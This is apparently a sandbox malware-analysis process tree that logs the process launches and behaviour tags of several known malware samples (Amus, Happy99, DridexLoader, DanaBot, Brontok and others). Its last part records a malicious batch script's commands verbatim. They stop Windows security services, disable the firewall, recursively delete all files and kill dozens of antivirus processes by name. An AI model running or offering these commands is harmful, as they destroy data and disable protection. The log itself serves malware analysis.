C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6616 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6688 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\Amus.exe"C:\Users\Admin\Downloads\Amus.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6964 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6988 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\Happy99.exe"C:\Users\Admin\Downloads\Happy99.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7296 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1652 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6252 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\Kiray.exe"C:\Users\Admin\Downloads\Kiray.exe"2⤵
- Executes dropped EXE
- Modifies system executable filetype association
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5500 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6540 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7296 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7424 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2524 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4824 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6484 /prefetch:82⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe2⤵
- Executes dropped EXE
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
-
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Microsoft Office\root\Office16\Winword.exe"C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Users\Admin\Downloads\DridexLoader.bin.exe.c26203af4b3e9c81a9e634178b603601"2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s AppMgmt1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004DC1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Microsoft Office\root\Office16\Winword.exe"C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Users\Admin\Downloads\Funsoul.exe"2⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exeOfficeC2RClient.exe /error PID=3568 ProcessName="Microsoft Word" UIType=3 ErrorSource=0x8b10082a ErrorCode=0x80004005 ShowUI=13⤵
- Process spawned unexpected child process
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Program Files\Microsoft Office\root\Office16\Winword.exe"C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Users\Admin\Downloads\Funsoul.exe"2⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exeOfficeC2RClient.exe /error PID=1788 ProcessName="Microsoft Word" UIType=3 ErrorSource=0x8b10082a ErrorCode=0x80004005 ShowUI=13⤵
- Process spawned unexpected child process
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Program Files\Microsoft Office\root\Office16\Winword.exe"C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Users\Admin\Downloads\Brontok.exe"2⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exeOfficeC2RClient.exe /error PID=1288 ProcessName="Microsoft Word" UIType=3 ErrorSource=0x8b10082a ErrorCode=0x80004005 ShowUI=13⤵
- Process spawned unexpected child process
-
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\DanaBot.exe"2⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\Downloads\DanaBot.exe3⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- Checks processor information in registry
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1884 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {22a5ea42-c889-41a1-b61a-19adf89e891e} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" gpu4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2392 -parentBuildID 20240401114208 -prefsHandle 2372 -prefMapHandle 2360 -prefsLen 24598 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4492062f-c01a-4c1d-b668-063be63edc8e} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" socket4⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3092 -childID 1 -isForBrowser -prefsHandle 1044 -prefMapHandle 3304 -prefsLen 24739 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9dbdcdfd-b705-4561-a668-25bbca3bcfcc} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3272 -childID 2 -isForBrowser -prefsHandle 2872 -prefMapHandle 2864 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {203ff740-4310-4853-836b-7e4acee2a20f} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4256 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4260 -prefMapHandle 4248 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ea99980-7aed-43bd-88d4-72333d170ed3} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" utility4⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5724 -childID 3 -isForBrowser -prefsHandle 5712 -prefMapHandle 5716 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ed29369-d3f7-4d65-aab7-f61c5449ad83} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5840 -childID 4 -isForBrowser -prefsHandle 5676 -prefMapHandle 5672 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a118151d-c364-405e-aa85-b4df3c888b14} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6004 -childID 5 -isForBrowser -prefsHandle 5924 -prefMapHandle 5928 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a1b48456-4707-4e87-8c3d-76c5ee22a3bd} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab4⤵
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"2⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"3⤵
- Checks processor information in registry
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1860 -parentBuildID 20240401114208 -prefsHandle 1776 -prefMapHandle 1768 -prefsLen 27051 -prefMapSize 244694 -appDir "C:\Program Files\Mozilla Firefox\browser" - {35e8408a-e5c1-4f58-bc39-4b5be3513546} 724 "\\.\pipe\gecko-crash-server-pipe.724" gpu4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2196 -parentBuildID 20240401114208 -prefsHandle 2172 -prefMapHandle 2160 -prefsLen 27051 -prefMapSize 244694 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {39976cf4-7467-4e4d-9200-dfbeb806c22a} 724 "\\.\pipe\gecko-crash-server-pipe.724" socket4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3280 -childID 1 -isForBrowser -prefsHandle 3264 -prefMapHandle 3260 -prefsLen 28434 -prefMapSize 244694 -jsInitHandle 1356 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8c2e986-b9b4-425b-b17f-c572887395e3} 724 "\\.\pipe\gecko-crash-server-pipe.724" tab4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3180 -childID 2 -isForBrowser -prefsHandle 3448 -prefMapHandle 3464 -prefsLen 32783 -prefMapSize 244694 -jsInitHandle 1356 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ed9a649-158a-4ae6-a987-b0a645d0fd45} 724 "\\.\pipe\gecko-crash-server-pipe.724" tab4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4496 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4460 -prefMapHandle 4440 -prefsLen 32837 -prefMapSize 244694 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae6dea11-6360-478f-aa90-1ea270e9d579} 724 "\\.\pipe\gecko-crash-server-pipe.724" utility4⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5736 -childID 3 -isForBrowser -prefsHandle 5748 -prefMapHandle 5744 -prefsLen 27366 -prefMapSize 244694 -jsInitHandle 1356 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11e2c06e-6b79-493d-b2da-75dd343bbc13} 724 "\\.\pipe\gecko-crash-server-pipe.724" tab4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5904 -childID 4 -isForBrowser -prefsHandle 5980 -prefMapHandle 5976 -prefsLen 27366 -prefMapSize 244694 -jsInitHandle 1356 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {79467a73-8e6f-4704-bd00-e6c841595ec8} 724 "\\.\pipe\gecko-crash-server-pipe.724" tab4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6072 -childID 5 -isForBrowser -prefsHandle 6080 -prefMapHandle 6084 -prefsLen 27366 -prefMapSize 244694 -jsInitHandle 1356 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {646a71f5-9d4c-4860-9ffa-b31750ec3a58} 724 "\\.\pipe\gecko-crash-server-pipe.724" tab4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5440 -childID 6 -isForBrowser -prefsHandle 5920 -prefMapHandle 5608 -prefsLen 32837 -prefMapSize 244694 -jsInitHandle 1356 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c790363-b92f-4481-897c-824822ab2a7c} 724 "\\.\pipe\gecko-crash-server-pipe.724" tab4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3268 -childID 7 -isForBrowser -prefsHandle 3292 -prefMapHandle 3272 -prefsLen 27445 -prefMapSize 244694 -jsInitHandle 1356 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5881ee0c-173e-43c1-b956-f282378abf23} 724 "\\.\pipe\gecko-crash-server-pipe.724" tab4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6684 -childID 8 -isForBrowser -prefsHandle 6800 -prefMapHandle 6740 -prefsLen 28322 -prefMapSize 244694 -jsInitHandle 1356 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ef029cf5-3ce8-499e-893a-1e96bbfa60eb} 724 "\\.\pipe\gecko-crash-server-pipe.724" tab4⤵
-
-
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\x.virus.cmd" "1⤵
- Drops file in System32 directory
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\System32\warning.txt2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\System32\timeout.exetimeout /t 10 /nobreak2⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K filespam.bat2⤵
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\System32\README.txt2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\System32\net.exenet stop "SecurityHealthService"2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SecurityHealthService"3⤵
-
-
-
C:\Windows\System32\net.exenet stop "Security Center"2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Security Center"3⤵
-
-
-
C:\Windows\System32\netsh.exenetsh firewall set opmode mode=disable2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\System32\cmd.execmd /k del /s /q **2⤵
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM av*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM fire*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM anti*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM spy*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM bullguard*2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM PersFw*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM KAV*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM ZONEALARM*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM SAFEWEB*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM OUTPOST*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM nv*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM nav*2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM F-*2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM ESAFE*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM cle*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM BLACKICE*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM def*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM kav*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM kav*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM avg*2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM ash*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM aswupdsv*2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM ewid*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM guar*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM gcasDt*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM msmp*2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM mcafe*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM mghtml*2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM msiexec*2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM outpost*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM isafe*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM zap*2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM zauinst*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM upd*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM zlclien*2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM minilog*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM cc* b2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM norton*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM norton au*2⤵
- Kills process with taskkill
-
-
